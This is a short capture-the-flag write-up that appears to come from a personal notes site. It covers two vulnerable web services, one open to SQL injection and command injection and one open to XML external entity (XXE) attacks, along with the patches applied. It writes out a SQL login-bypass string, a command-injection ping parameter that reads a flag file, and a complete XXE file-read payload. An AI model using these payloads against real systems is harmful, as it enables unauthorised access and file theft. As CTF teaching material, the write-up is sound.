search
Github

wu

  • I wasn't sure if we were allowed to do wu, but I wrote a brief summary for my own records.

hashtag
tldr;

attack / defense ctf where you were given 2 web services to defend and attack other teams' instances:

hashtag
🌟 Mercury Service (Port 8080)

  • original: vuln.py - login endpoint, flag is in /home/rta_service/flag.txt

    • vulnerability: sqli bypass + command injection via /ping

    • exploit:

      • sqli login with admin' OR '1'='1 β†’ authenticated and then ping with command injection,

      • targets /ping?host=127.0.0.1;cat /home/rta_service/flag.txt

  • patched: added session management, input validation, honeypot traps

hashtag
🌟 Mars Service (Port 8080)

  • original: app.py - Unsafe xml parser with resolve_entities=True

    • vulnerability: xxe (xml External Entity) injection via file upload

    • exploit: upload malicious xml to read sensitive files

    • poc.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///home/rta_service/flag.txt">
]>
<root>
  <item>&xxe;</item>
</root>

  • patched: disabled external entities, added input validation

hashtag
please dont do this at home.

leave a honeypot and a fake flag up since I know they are automate to hit my services. Now I have a bunch of ips πŸ₯€, please use vpn

Previousinfinite ctf qualifierNextholmes ctf

Last updated